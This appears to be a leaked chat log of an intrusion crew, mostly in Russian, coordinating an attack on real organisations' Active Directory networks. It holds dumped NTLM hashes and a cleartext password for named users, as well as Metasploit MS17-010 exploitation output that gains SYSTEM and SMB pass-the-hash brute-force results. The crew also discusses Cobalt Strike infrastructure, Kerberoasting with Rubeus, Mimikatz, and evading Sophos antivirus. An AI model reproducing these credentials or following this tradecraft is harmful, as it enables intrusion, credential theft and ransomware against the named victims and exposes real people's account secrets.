6e40d6d997a5d7621a3c51f836c2c9f6 512 3184 tbuseth 1a60a6e3a4db305a9cbc8fc4522eed2d 66080 1725 krhammer 8b6ed8f3965da2296f924c4dc7cda017 512 3227 srmabanta 8e9568f4d0e46735f731adcbd02ff3b2 66080 1809 ewleopold b5a372118565ff272d600097181272d5 512 2070 kmochsendorf 65a13a298816a8804ad0e56f6d066052 66080 1370 lmbaez a2c4803d9e45db3c8fea23335f425a3d 66048 3692 pholmes 9361c8cfcbe72efc56fbfc38bfd3ac34 66080 3715 cosborne c5ffa688e2eaf45e3aaddc670d60e924 66080 3695 snordby 7b3690121840a53b82e38c9d84cccd3b 544 1978 sjaday 2aa8d3a2efecf9392bdad316ffe58204 66080 3287 ahmeda a786dde97ed0e8a0dc4b4101b89d0354 544 1985 aaltamirano 14633fe81d99ada0956694ccef9c77e7 66048 1623 boscjlxr 60715fe92ab15af8b5a6eb78908eba1e 512 1646 jmstyvxr 249dd04b3c41068af6c58b94c44aaf69 512 3786 alharnisch ee098fd8f7bd735743966c13570a0086 544 3251 mecker 8908a51e1f8985b7cb9420848c9f46d7 66080 2035 MRNWKS9$ 3c0b0db88bb2d8886cb25f5c68a71e16 4096 3668 LRHC$ 6da3553db64a74927e867700459ec640 2080 1506 jroberts 
79828a3a4c96b7970e8211f140636f18 512 3286 herbaughb d827ee57145e0d8eceed6313358511fd 544 1784 sborsgard c18b6543a6eec71f44a94ec05474f792 66048 3258 lindsayw aa6c3883788ac2f71d00f3e5dbbfb35d 544 1629 kmhansxr d66e52a5f21e0d39eb4cef8c6bf05737 512 3213 kpiechowski c59c8922de63bc3c2136a52f4c1c6334 544 3610 wcporter f70d8147f106cee0fc67d4d2e0fc6ecd 66080 1609 klr d23713c8361026ad0a8f710ceeb1c6de 66048 3228 kigriffie 71eb4f33f5b68b91d34c1e56feb72cd9 66080 2034 MRNWKS6$ 4315e02ab31cbadb75deebf29aee3f4c 4096 1965 laspangler f2f30efb3bbe1993d17ddb853d4ad569 512 1644 lbheiden ea69b248b4fb74e5076c4e6085376236 66048 3767 mbsahin 6f18c8d46bee3e37db945fb3f6fb92f3 66080 2086 joanderson 5afdb1e681f188213cb5affb6c79df9d 66080 2030 MRNWKS7$ b96691c586b3657a952ef8ea1da74ac5 4096 2041 jdovergaard b47a066f40ccf1d76fd4000cfaa35d13 66080 3646 mtbenson 6d5b86313752d11db7997a34e12dc0f8 66080 1110 alibe a80fdb8db842a99d87ef3d857f8ddcf1 66048 1108 ali a80fdb842a99d87ef3d857f8ddcf1 66048 1642 drorandi 866b8826bfd5fff14c59775e5729bafc 66048 3152 cjedin c21f1b18aaac94f439332acb78ab4532 66080 2036 RADDC01$ ac668ff27865e411e6a3198940ed2b5f 532480 1572 MRNODE1$ 59a564e81ef6c0c37df0d60f8527a6eb 4096 1579 RADDC02$ cbdabc82ea9ee3d8d804ba2b9f89dd04 532480 2024 MRNSTORE0$ b928b07146e0445419dd1699b3cca5e0 4096 3725 abuehring 65be0db2b857963ad796e6e0d0def162 66080 2026 MRDB-CLUSTER$ 15e0f37b3609471f835ae577085e23a0 4128 3677 MRNWKS19$ e21efb05c6ce9ac89c2e7e30dcf49c62 4096 1698 apschrmu 2a6d0812775eb89f6f3077934bcf95f2 512 3183 elynnes a6ca874c62b05d592273dd708ef187d2 544 1797 drmouser b56354d9266cba25422ab15e8547bcf5 512 2102 LRH-DYNACAD$ 4743dfcacb4876815bf14b75f4acf9ae 4096 3269 mrlee b5b7af6574a6f394e855649382cda928 66080 3196 cplindgren dc316faba52608ac3f441c84727feab0 544 1862 rlkaczmarek f5f1b18257325ed5fe2e87d0aaf759e8 512 3260 briannav 107e0ca156a9c8cab7be287dcd41aaec 544 1631 slhighland 2da4bf65438772db6ceb5ff2d409e57d 512 1649 sathomas 8346863b35867cd414e4e3731ea2da4b 512 3114 chmiller 
a1f79ae5f9a44c0cba0b6c06bd1e1f5c 66080 3262 morganr 1d0b364bc66b6c951599e11c914e7e7d 544 1568 kolson 058405257249b0c11ec365f8a6370982 66048 2029 MRNWKS10$ f658d35e5cecd87b58e87fe7857b1b2f 4096 1453 skerr 323fcf8e029f3231fd4121a3826a20f3 512 3229 mhalsumrain 695d0eefdfabb555707356abede42eef 66080 3694 krogahn 52879cdd1a4b4923e67fd6f4e2cdfe53 66080 3214 thovde 5587afee05c46b510a50d9e466170d34 66080 3264 stephanieb f5aaeeb4c446730ca370dd949c7fb0c3 544 3781 Kmikkelson cece59201cfefd426aab5fb76db4e59c 544 3771 kjschulte ced6be295f37375e1213919fc8e36043 544 1630 kjhatlxr bf4c3092a586df1a9137a4f5737bdc94 512 3261 brandif dcdc950485cb74a73bf4bf80a4101dac 544 1524 alinds ffd6d72372040691add367549b688221 512 3259 ruthj 6759d99e6711980d074fecb45aff5b55 544 1639 j_larsxr 4f7c65775d8bda83d8216bb2091917cf 512 2047 caaffield 92961d60f619b6063bfd2765a679dc82 66080 1548 maolson 85b0a1c1f6f44a83cc75b62dde6f0eaa 512 3199 smartin 75e426efab18059cfa6684258f4a7d3a 66080 1449 atduenow d245b15328227ea8c8307d7aae721a73 512 1575 MRNWKS11$ 29e77d391aa2f097349593368b67cb18 4096 1636 mtkerrxr f902b05bebc3d13fa0187f84a44b0e1c 66048 3137 MRTEST0$ 28c309a1ac3eaa0801839a1e991561b1 4096 3752 mbhintz 207c08a4223d1b19c53eda8e717d5129 66080 1551 crott 5ce23e414589110e9fba3537ae619600 66080 1475 kbaumgartner b348e7647e07f39ef4d706ab455342e6 512 3249 mthovland 75770dd4f66f4ed318db64ad1ce80b0f 544 1550 jeolson 62ff1aee79dada73b838aec7ca3c560f 512 3119 alasmith a8b89435d1634fd4f45bf671d030f11c 66080 2091 lljerger 7cc9ff2da474e85a3e24018222e1ecfe 66080 3202 jsplichal bcafe80cbf6ea2cab1a96a3612c6cf03 544 2098 metungseth d9840a8afed2ee1b85b8c1dce0a3517c 66080 1265 annlewis 47662aed884a95174de29f642ca62727 512 1847 warncmmu e5bee5800f65d4baf2fd1586ed7d91f9 512 1767 drlokken a73a9b3f676a4d888c4a5588b23a5521 512 1117 NSERV4$ d2984a8f64aba5ad5d32826bd079ae32 4096 3160 cbeebe 810c09ebbcb1062afb2534ecd6ed7a86 544 2033 MRNWKS8$ e25c5c3af53b8a77d1b02bdf95e04e5e 4096 3272 gasaithambi 605e5c6b40e4761041a2b9e86d8f737b 
544 1280 janeshaikoski 8384445ee87621f5ec558039a4631833 512 1230 drwswenson 953f520c1123239f61fafd0729e2d1a7 512 3248 nmholte 6b5bdab1c58aba731f34c5aa9893e239 544 1392 drgutzmer 3f9bfd262caed9b0918ff698f290d982 512 1660 ganoyeor 0cfccc49bb0f47f8765a90dfa47ec2b1 512 3607 ajfolstad fb07bda7eb6eb3fa33c9cd7450dc19a3 66080 3265 clstevens c0a90aaacfed09136dcabf7540124dc1 66080 1855 mtvukonich 51a9889746fe107c490c30c0372fb1ed 66048 1187 kjrufer 9d264109febd8b4aaec37f3467cd2180 512 3723 hstark db3d0ebf38ce9c5fb109294ac74eae 66080 2605 jpdinsmore a27cb2e1f9cde5f54f8c23a98e8600b6 66080 2031 MRNWKS5$ f94cf5e2f2c701d33571dc05dc22c1c3 4096 2023 MRNODE0$ e6f7d306302e941d4054d2f64697c775 4096 1576 MRNWKS4$ e2552f80f2a0486087f7250e87827f63 4096 1627 dldulsxr 47a0d7a2228cbe82a7d01204776cafd2 512 3712 kkrog 9de71f50a4cbb09c2e8bf0c21f0d9e67 66080 1199 mdstoesn 8196972a013c829e19ed30d4093a58be 512 3783 jbragland 13852671dbfdaf8f18f5421a04aab22c 66080 1651 jawestxr e666aafcf2ec56a38e12a903bb1778eb 512 3769 shdoesken ce58cc8ec2d8ee3b8588d1f01988ebe6 66080 2001 ndschmid 956d16814a204bb9050b4e1401f3a0ef 512 3289 smjohnson b2f73e099710c5f03524394f7276b01c 544 3735 emonroe bb325c88326c35682915d48170924800 66080 3257 kecian 2f09c790c9569a4e2da502ae93f1234d 544 ``третью притянулпервые две не пришлине все прилетаютну дазато есть с чем работатьжаль не на дкну вот)`` Success: 'LRHC\pdsanderson:922.Hibe' Administrator ``` ``` 10.10.220.45 10.10.35.9 10.10.34.87 10.5.50.180 10.5.50.192 10.10.34.18 10.10.34.167 10.10.34.59 10.5.50.228 10.10.34.35 10.5.66.105 10.10.35.71 10.10.34.173 10.10.35.65 10.10.35.57 ```теперь точно im inну всё)на двухопугуну пока что админ только на однома стоп ёпта он ж доменный юзер....да не залочить бытак и в чем проблема::(однако ``` The request will be processed at a domain controller for domain ffmg.local. 
Force user logoff how long after time expires?: Never Minimum password age (days): 0 Maximum password age (days): 999 Minimum password length: 4 Length of password history maintained: 3 Lockout threshold: 10 Lockout duration (minutes): 1 Lockout observation window (minutes): 1 The command completed successfully. ````922.Hibe`так проще будетщая отпинговал в этом трасте все тачки и отпингованые пропустл на мс17[ ](https://mediaeveryone.com/group/lrhc-org?msg=oNfJkCtLxJjXWyW3a) этона деругие серверные оспроверь)))))))длка не летит`` There is not enough space on the disk. 0 file(s) copied. ```давай?хош ржакуинтересно)`` LRHC\pdsanderson 8a48ebb4e8aadeb8f71b999ba84ab520 ``на втором вот однако`` msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 10.5.50.192 rhosts => 10.5.50.192 msf6 auxiliary(admin/smb/ms17_010_command) > exploit [*] 10.5.50.192:445 - Target OS: Windows 5.1 [*] 10.5.50.192:445 - Filling barrel with fish... done [*] 10.5.50.192:445 - <---------------- | Entering Danger Zone | ----------------> [*] 10.5.50.192:445 - [*] Preparing dynamite... [*] 10.5.50.192:445 - [*] Trying stick 1 (x86)...Boom! [*] 10.5.50.192:445 - [+] Successfully Leaked Transaction! [*] 10.5.50.192:445 - [+] Successfully caught Fish-in-a-barrel [*] 10.5.50.192:445 - <---------------- | Leaving Danger Zone | ----------------> [10.5.50.192:445 - Reading from CONNECTION struct at: 0x8ae943d8 [*] 10.5.50.192:445 - Built a write-what-where primitive... [+] 10.5.50.192:445 - Overwrite complete... SYSTEM session obtained! [+] 10.5.50.192:445 - Service start timed out, OK if running a command or non-service executable... [*] 10.5.50.192:445 - Getting the command output... [*] 10.5.50.192:445 - Executing cleanup... [+] 10.5.50.192:445 - Cleanup was successful [+] 10.5.50.192:445 - Command completed successfully! 
[*] 10.5.50.192:445 - Output for "net localgroup administrators": Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator FFMG\Domain Admins FFMG\psanderson LRHC\pdsanderson The command completed successfully. ``на первом не прошло`ffmg.local` ``` [+] 10.5.50.2:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit) [+] 10.5.50.192:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit) [+] 10.10.220.45:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit) ``Rubeus ``` [*] Target Domain : mcklrh.mig [X] No users found to Kerberoast! [X] No users found to AS-REP roast! [*] Target Domain : ffmg.local [X] No users found to Kerberoast! [X] No users found to AS-REP roast! `````` msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit [10.10.39.73:445 - Host does NOT appear vulnerable. ``` :zany_face:ещё пытаемсякак прошли в траст?``` 10.10.39.73 CLINICDC.ffmg.local ````ffmg.local\canderson Gt#832!e`через пару часов к вам еще 2 товарища присоеденятсядавайя поэтому и говорю ща пошукаю как в рубеусе домен указыватьи наоборотинвок керб нетчто рубеус находиттак бывает такоетогда скорее всего нет кербов в другихдас двух трастов?был пустой файл 1 кбайти какой вывод был?и с -domainмы загружали его в тпшнеттак вы на диск роняли и его блочило?так мы же им просили уже через ТаКтИкАл ПоВеРшЕлЛи можешь через инвок керб попроситьpsinjectтак этоща пошукаю на гитеа чет для рубеуса у меня даже не сохранено такого нигдея помню как инвок-кербом просилизабыл что керб можно с траста просить?))или в рубеусе можно соседние домены опрашивать?так тут то зачем рубеус? 
у нас же отсюда все хэшии отдай @tl2сразу рубеус подрубии пытаться пролезтьща токен буду натягиватьпонялты в трасте или просто сетку притянул?это не траста стопдаже мем поискал)2003 не притягивается:Dну, как говорится im inпервая часть[ ](https://mediaeveryone.com/group/lrhc-org?msg=eRYWi5Wg6x3hrAZsx) не, хеш для всех одинаковыйна дедике в мсф не заходит чёт[ ](https://mediaeveryone.com/group/lrhc-org?msg=X33pSY4icNZ6ieosT) выше кинул что подошло из имеющихся ЛА и ДА, да и у хеша ведь первая часть от домена зависит же, он пустит такой хэш разве?скрин командной строки[ ](https://mediaeveryone.com/group/lrhc-org?msg=S9kX3FAeMYYh4Gdbs) этих ребят на траст тоже проверьтерезультат смблогина?чтобы ЛА запроситьу нас доступа то к дк нета не скажущас скажу[ ](https://mediaeveryone.com/group/lrhc-org?msg=NNGSmc9G4Ry5P9Ese) в трасте[ ](https://mediaeveryone.com/group/lrhc-org?msg=NNGSmc9G4Ry5P9Ese) не так прочиталмой косякаа я говорю про трасты вашего входоного доменатраст это трасттекущий это входнойкак я понялну текущий траст это ваш входной доменпросто в трастахчто))текущий траст??нетв текущем или трасте?на ДК где?я после того как загрузили и написал, что файл 1 кбайт пустой создаётся[ ](https://mediaeveryone.com/group/lrhc-org?msg=DiJd8WN9qHwQBDX9P) а его на ДК в ЛА нет?да мы грузили`rlschmidt` я под ним снимал инфу, его нет в трастахвы роняете скрипты зачем? грузите их сразу в памятьк вопросу о кербахэто очень хорошотак ну молодцы сняли ад`st.exe -b dc=mcklrh,dc=mig -f "(objectcategory=person)" > C:\Standalone\mcklrh_mig_ad_users.txt` пример командыа тот админ под которым снимали не имеет доступа в трасты?только у меня не отработалочерез -hкороче как я вчера пыталсяхостзапустил cmd от админа и отработал батником адинфо@user7 хостил в какую категорию? 
@hosts @uploads ?[ ](https://mediaeveryone.com/group/lrhc-org?msg=pyWba7aHGMXYo8gd2) не поверишьдавайте порядкуне залито[ ](https://mediaeveryone.com/group/lrhc-org?msg=hF9NeXsdrJkqW3NSi) так ронять и нельзя[ ](https://mediaeveryone.com/group/lrhc-org?msg=zhkZaHHwvy2xRkCEg) залито куда?как сняли ад инфо сабов?как там с кобой обстоит вопрос` @migrate [pid]```` Invoke-Mimikatz ````Invoke-PSInject.ps1``jyrkwa`ронять его бессмысленнорубеус только уже потом если имея кобуInvoke-Kerb создаёт пустой файл 1 кбайт в обоих трастахсофос жрёт всё роняетсячерез врд тоже не даёт скачать@tl1 это все адинфо если чевсё остальное минуса`` [*][*] 192.168.254.92:445 - 192.168.254.92:445 - Starting SMB login bruteforce 192.168.254.93:445 - 192.168.254.93:445 - Starting SMB login bruteforce [192.168.254.92:445 - 192.168.254.92:445 - Correct credentials, but unable to login: 'lrhc\admin:aad3b435b51404eeaad3b435b51404ee:d763de4cc9fe59203df903a5d98f8414', [*] 192.168.254.93:445 - 192.168.254.93:445 - Correct credentials, but unable to login: 'lrhc\admin:aad3b435b51404eeaad3b435b51404ee:d763de4cc9fe59203df903a5d98f8414', [+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\svc-aadc:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028' [+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\svc-aadc:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028' [+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\AvamarBackupUser:aad3b435b51404eeaad3b435b51404ee:d6538f029c412d2acf4ab547ee69bfce' [+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\AvamarBackupUser:aad3b435b51404eeaad3b435b51404ee:d6538f029c412d2acf4ab547ee69bfce' [+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\CDW.Tech1:aad3b435b51404eeaad3b435b51404ee:8e7aca5c0b671015c90656325fb9ea15' [+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\CDW.Tech1:aad3b435b51404eeaad3b435b51404ee:8e7aca5c0b671015c90656325fb9ea15' [*] 192.168.254.93:445 - 192.168.254.93:445 - 
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```
and the computers
I'll step away for a bit
and after checking the admins you can study PS Empire
+
in three passes
ok, then one at a time: first LA, then the current one, then the trust
only login and pass go into the file
but I think the domain is given separately
honestly I've half forgotten
I'm just thinking whether to blast them all at once, or first this way, then that way and the other
write the domain in the file, or specify it separately for everyone in SMBDomain?
in smb_login the domain is given as a separate option
then I do have a small question after all
with the trust domain
with the current domain
i.e. without a domain
even with 3
yeah?
with the domain too
or like you said earlier
I check pure LA without a domain
or no.
so, a question about USERPASS_FILE in smb_login
ok
to work in the current domain through PS Empire instead of cobalt
that's why I asked
so why are you telling me about it
there's no PS on win2003 ))
and speaking of PS Empire and win2003
fine
or at least a new cobalt
we'll talk further )
once there's an LA on the DC in that domain
check the hashes as agreed
don't touch it for now
so can 2003 really be pulled into PS Empire?
PS can work with hashes
a fallback option right away
okay
for now check the admins
the new cobalt will be ready in a couple of hours
so here's the thing
how network admins configure equipment, and with what, is a long discussion
and about private ones
just on some open sources with data about cobalts and other utilities
honestly I don't want to get into this topic now
after a network is closed the cobalts immediately get covered in shit
you gave him the network in cobalt, so how does @user4 work then?
you've been working with them for quite a while already
everyone's cobalts are in the BL
ours
every one
and mine too
literally all of them
I'm telling you, I pinged all the cobalts
well then your cobalt is in the BL after all
and wasting time
lol )
```
C:\Users\wevvewe\Desktop>ping google.com

Pinging google.com [172.217.4.238] with 32 bytes of data:
Reply from 172.217.4.238: bytes=32 time=30ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127

Ping statistics for 172.217.4.238:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 30ms, Maximum = 31ms, Average = 30ms

C:\Users\wevvewe\Desktop>ping fullref.com

Pinging fullref.com [45.128.156.27] with 32 bytes of data:
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127

Ping statistics for 45.128.156.27:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 65ms, Maximum = 65ms, Average = 65ms

C:\Users\wevvewe\Desktop>ping wikibros.com

Pinging wikibros.com [198.18.0.1] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
```
rather than studying Empire
I think it's better to do what I know how to do
give me the ping of the domain above
then the plan is this
it still has to be studied
haven't tried
does PS Empire work? )
and by the way, the million-dollar question
give me a ping of `fullref.com`
google pings
but the cobalts?
yes
does the VPN see the outside?
tell me this
like this, the same answers
23[.]106[.]61 cobalt
oh fuck
maybe I misunderstood something
not everything was said at once, of course
more specifically?
colleagues
10[.]10[.] and so on[.]
who said so?
well, that's what I was told here
also in quotes and apostrophes
well, that's wrong
this IP
similarly
by IP?
'wikibros.com' cobalt )
and how did you google it??
it's burned
so it all adds up
wikibros.com
by IP it gives nothing, by domain name it sends you to a Mario fandom
all ok
well, like I said
ask the colleagues who work with gopher how to tell
yes, it's written right there: tvoya koba zasvechena tikay s gorody
is there simply nothing like that?
BEWARE, YOU'RE FUCKED IF YOU SEE THIS DOMAIN/IP
it'll be written right there
if my cobalt is burned, how do I tell?
and while you're at it, check the admins
check the domain's IP against the "IP" cobalt list
I checked just recently
check
I think so by now
seems not
is yours burned?
your colleagues told me recently that their cobalts are burned
100% loss
I pinged all our cobalts from the dedi and from the DC of the current domain
and about the cobalts
ping wideio.com doesn't respond there
that's what I mean
so on 2003 there's no PowerShell at all
and the current one sees it
2003 doesn't see tpsh
how fresh is your cobalt? )
but not all
and tpsh is visible
yes
the cobalt
and is msf visible?
and behind the VPN the cobalt isn't visible
you go into the trust
so the dedi is behind the VPN
you make an admin token
pth
I understand you can wrap the dedi into cobalt in a process
with the hash
and what to do
then, say, 1-2 matched
yes
for LA
I'm starting
well
no
and you start running them one by one against both DCs
are you on about cmd5 again
1 to 1
with their hashes
you take the current DAs and EAs
it's a brute of sorts there
why?
yes, a lot
but how do you address it without being able to create a token via the hash
that you can brute with a hash
that I understand
with the hash, that is
and smb_login likes hashes
what's the point
the ones I DEFINITELY bruted have identical passwords
and hashes for everyone )
there are clear creds for 4
```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
admin                    Administrator            AvamarBackupUser
CDW.Tech1                CDW.Tech2                CDW.Tech3
cdw.user01               cisadmin                 frsecure
gsnelson                 jyrkwa                   lljennbi
nmsapps                  OnPremMigAdmin1          OnPremMigAdmin2
OnPremMigAdmin3          pmpetecc                 PRHADMIN
PsService                PsSupport                Pssupport01
radmin                   tms01                    TMSXE.Service01
UCAdmin
The command completed successfully.
```
```
Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator            frsecure                 jyrkwa
PsService                PsSupport                Pssupport01
svc-aadc                 tms01                    TMSXE.Service01
UCAdmin
The command completed successfully.
```
I'm already confused, we call them all kinds of things here
new cobalt as in a new network, or a team server?
I checked yesterday, but I don't remember exactly who I checked
```
lrhc\Administrator
svc-aadc
mcklrh\svc-aadc
lrhc\svc-aadc
```
in 2 hours I'll hand out a new cobalt
in short, we run all the DAs and EAs against the trust DC
can brute )
```
The request will be processed at a domain controller for domain mcklrh.mig.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          Unlimited
Minimum password length:                              5
Length of password history maintained:                1
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.
```
give me net accounts
and without specifying the domain, accordingly
take all the DAs from the current domain and try them as local admin on both DCs
that's the option I see so far
look
that doesn't depend on MS17
and can you even add to a non-local group via MS17?
but there's a big chance of screwing everything up
I thought about it
but it's a noisy method
then remove it
make your own DA and under it quickly fly into the domain
as an option
then I killed it
to be more precise, 30-40 minutes
yes
and the process hung for an hour?
even if 0 bytes
the files were being created though
so with the permissions it was ok
you can check in windows\temp to rule out any doubts
but then it's 2003, maybe there weren't enough rights on the root...
ah
ok
well, since you said you tried the drive root too, that option is out
I told you, check windows\temp
well yes
ProgramData isn't a folder on 2003
lol btw, only just noticed
yesterday I did it from the VPS and it gave an error
now I'll try to make a DLL for the dedi then, and from there do enum_ad_* in msf
thought at least here something decent would come out
that's why I moved to msf
yes
still a miss, yeah?
that's how I tried it originally
dedi - domain box - query the trust
and you get a connection
via wmic under DA creds you run the files that dump AD from the trust you specified in the batch file
from the dedi you push the files for dumping AD inside the domain onto some server
catch the idea )
it's the only accessible box
that it's a screw-up inside it
I can refer to win2003
I checked it with smb_login
he's a domain user there
the admin I added
no wait, look
so the trust gives you nothing
and you yourself aren't a domain user
maybe the thing is your box officially isn't in the domain
+ from a DA context
try making a request through the trust from a domain box
I'm trying through meter from the trusts
yes
and from the trusts
via wmi?
there
uh-huh
same as ntds
remotely
from the dedi
in the current domain I dumped with an adfind batch file
отрив
meaning?
how did you run adfind if from the dedi behind the VPN?
enum_ad_users
it just doesn't work with a meter session on the VPS
the question is this
don't do it yet
no
I'll make a new DLL now then, I saw it, it just needs a meter session there
I also use MS17 from the dedi sitting behind their VPN, and my meter is on the VPS; I thought it'd somehow work without that, but I'll have to pull a session into msf on the dedi
do a search for enum_ad_*
msf has the enum_ad_users module
right, true
and I also don't understand why, @user8 has a session there, doesn't he?
it has to go in hosts
and where did you upload it anyway? ))
https isn't supported
http://
how do you upload files to the box via tpsh? I can't manage it
seems so
and does it see the outside?
there's nothing, somehow
check
and the unattend files
some with wmic, some with MS17
both ways
are you running commands there via MS17?
haven't dumped yet, Rubeus gets cut when I drop it on the dedi, even though I turned Defender off, and Invoke-Kerb is on PS
were there kerbs at all?
and in the trust I don't see it in the processes
in the current domain
say on the current box it is in the processes
though on the other hand it's not visible in the processes
but maybe it's Sophos
what Sophos is there
there's another guess
I also think it's Sophos
I tried the root too
hmm, apparently Sophos is installed there
what's the point
try re-dumping AD into this folder
uh-huh
mostly files like this there
it didn't fit in my terminal
I won't dump the whole dir
```
C:\Program Files\Microsoft Azure AD Sync\UIShell>tasklist /s 192.168.254.107 /v

Image Name                     PID Session Name        Session#    Mem Usage User Name                                          CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process              0 Console                    0         16 K NT AUTHORITY\SYSTEM                                4152:02:24
System                           4 Console                    0        268 K NT AUTHORITY\SYSTEM                                   0:19:18
smss.exe                       456 Console                    0        496 K NT AUTHORITY\SYSTEM                                   0:00:00
csrss.exe                      876 Console                    0      4,236 K NT AUTHORITY\SYSTEM                                   0:02:07
winlogon.exe                   916 Console                    0     13,652 K NT AUTHORITY\SYSTEM                                   0:00:08
services.exe                   960 Console                    0     66,924 K NT AUTHORITY\SYSTEM                                   3:56:01
lsass.exe                      972 Console                    0     27,744 K NT AUTHORITY\SYSTEM                                   0:28:38
svchost.exe                   1152 Console                    0      3,568 K NT AUTHORITY\SYSTEM                                   0:00:00
svchost.exe                   1604 Console                    0      4,820 K NT AUTHORITY\NETWORK SERVICE                          0:20:17
SavService.exe                1684 Console                    0    260,956 K NT AUTHORITY\LOCAL SERVICE                            4:45:31
svchost.exe                   1428 Console                    0      6,224 K NT AUTHORITY\NETWORK SERVICE                          0:00:06
svchost.exe                   1444 Console                    0      7,272 K NT AUTHORITY\LOCAL SERVICE                            0:00:02
svchost.exe                   1492 Console                    0     25,288 K NT AUTHORITY\SYSTEM                                   1:57:11
spoolsv.exe                    556 Console                    0      5,704 K NT AUTHORITY\SYSTEM                                   0:00:52
msdtc.exe                      580 Console                    0      5,048 K NT AUTHORITY\NETWORK SERVICE                          0:00:00
avagent.exe                    476 Console                    0      9,012 K NT AUTHORITY\SYSTEM                                   2:05:38
cpqrcmc.exe                   1380 Console                    0      1,380 K NT AUTHORITY\SYSTEM                                   0:00:00
vcagent.exe                   1408 Console                    0      7,800 K NT AUTHORITY\SYSTEM                                   0:00:00
Tuner.exe                     1572 Console                    0      2,664 K NT AUTHORITY\SYSTEM                                   0:00:09
svchost.exe                   1732 Console                    0      2,644 K NT AUTHORITY\SYSTEM                                   0:00:00
INETDSRV.exe                  1924 Console                    0      2,872 K NT AUTHORITY\SYSTEM                                   0:00:00
machd.exe                     1960 Console                    0      1,960 K NT AUTHORITY\SYSTEM                                   0:00:00
nmserver.exe                   252 Console                    0      3,832 K NT AUTHORITY\SYSTEM                                   0:00:00
ntfrs.exe                      772 Console                    0      1,616 K NT AUTHORITY\SYSTEM                                   0:00:19
svchost.exe                    836 Console                    0     15,168 K NT AUTHORITY\LOCAL SERVICE                            0:11:34
RCMDSVC.EXE                   1460 Console                    0      1,220 K NT AUTHORITY\SYSTEM                                   0:00:00
SAVAdminService.exe           1808 Console                    0      4,300 K NT AUTHORITY\SYSTEM                                   0:00:18
snmp.exe                      2116 Console                    0      7,052 K NT AUTHORITY\SYSTEM                                   0:04:09
ALsvc.exe                     2216 Console                    0      1,828 K NT AUTHORITY\SYSTEM                                   0:00:20
McsAgent.exe                  2412 Console                    0     16,440 K NT AUTHORITY\SYSTEM                                   0:11:23
McsClient.exe                 2568 Console                    0      7,952 K NT AUTHORITY\NETWORK SERVICE                          0:00:05
swc_service.exe               2688 Console                    0      4,668 K NT AUTHORITY\SYSTEM                                   0:00:00
swi_service.exe               2744 Console                    0     29,560 K NT AUTHORITY\SYSTEM                                   0:00:05
smhstart.exe                  3048 Console                    0      3,848 K NT AUTHORITY\SYSTEM                                   0:00:00
hpsmhd.exe                    3180 Console                    0     12,280 K NT AUTHORITY\SYSTEM                                   0:00:01
cpqnimgt.exe                  3244 Console                    0      6,248 K NT AUTHORITY\SYSTEM                                   0:00:00
cqmgserv.exe                  3304 Console                    0      3,584 K NT AUTHORITY\SYSTEM                                   0:00:15
cqmgstor.exe                  3352 Console                    0      5,680 K NT AUTHORITY\SYSTEM                                   0:00:33
dfssvc.exe                    3384 Console                    0      3,884 K NT AUTHORITY\SYSTEM                                   0:00:00
sysdown.exe                   3476 Console                    0      2,036 K NT AUTHORITY\SYSTEM                                   0:00:00
cqmghost.exe                  3632 Console                    0      8,232 K NT AUTHORITY\SYSTEM                                   4:49:33
wmiprvse.exe                  3660 Console                    0      8,020 K NT AUTHORITY\SYSTEM                                   0:00:01
rotatelogs.exe                3852 Console                    0      2,560 K NT AUTHORITY\SYSTEM                                   0:00:00
rotatelogs.exe                3860 Console                    0      2,540 K NT AUTHORITY\SYSTEM                                   0:00:00
hpsmhd.exe                    3916 Console                    0     18,236 K NT AUTHORITY\SYSTEM                                   0:00:01
rotatelogs.exe                3988 Console                    0      2,572 K NT AUTHORITY\SYSTEM                                   0:00:00
rotatelogs.exe                3996 Console                    0      2,552 K NT AUTHORITY\SYSTEM                                   0:00:00
wmiprvse.exe                  5168 Console                    0     38,700 K NT AUTHORITY\NETWORK SERVICE                          3:27:29
svchost.exe                   5992 Console                    0     12,236 K NT AUTHORITY\SYSTEM                                   0:00:22
alg.exe                       6136 Console                    0      3,696 K NT AUTHORITY\LOCAL SERVICE                            0:00:00
logon.scr                     4272 Console                    0      2,004 K NT AUTHORITY\LOCAL SERVICE                            0:00:00
minituner.exe                 4816 Console                    0      2,732 K NT AUTHORITY\SYSTEM                                   0:00:00
```
```
02/08/2020  03:56 PM               134 Sophos AutoUpdate 5.8.358 setup log 20200208 155610.txt
```
